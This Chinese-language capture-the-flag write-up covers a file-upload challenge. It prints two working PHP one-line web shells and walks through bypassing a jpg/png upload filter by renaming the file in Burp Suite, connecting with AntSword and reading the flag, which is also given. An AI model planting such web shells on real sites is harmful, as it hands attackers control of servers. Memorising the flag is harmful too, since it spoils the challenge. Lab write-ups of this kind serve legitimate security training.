工具
中国蚁剑
Burpsuite
解题过程:
遇到文件上传问题我们应该想到上传木马并渗透控制网站,在网站根目录中找到我们想要的信息。
对于木马首先则是需要学会使用一句话木马,木马最根本的作用就是控制网站,不同的命令会导致测试链接的密码不一致又或者有的命令在上传后会有回显,以下是两句木马均可用于制作上传,不过一个测试密码为123,一个测试密码为attack。
<?php @eval($_POST['attack']);?>
<?php eval($_REQUEST[123])?>
制作木马
将木马编辑txt文件并将txt文件重命名为jpg文件(因为该网站仅要求上传jpg/png)
上传木马
上传木马后对网站进行抓包,并将图片后缀名修改为php,点击forward提交,返回页面查看上传文件若显示为php则修改成功。
连接
空白界面右键点击添加数据
输入文件上传后的网址以及木马中的提交密码进行连接。
连接成功后进入网页在根目录查看即可找到Flag:cyberpeace{684641c87be6b333e0157f5fad27cdb5}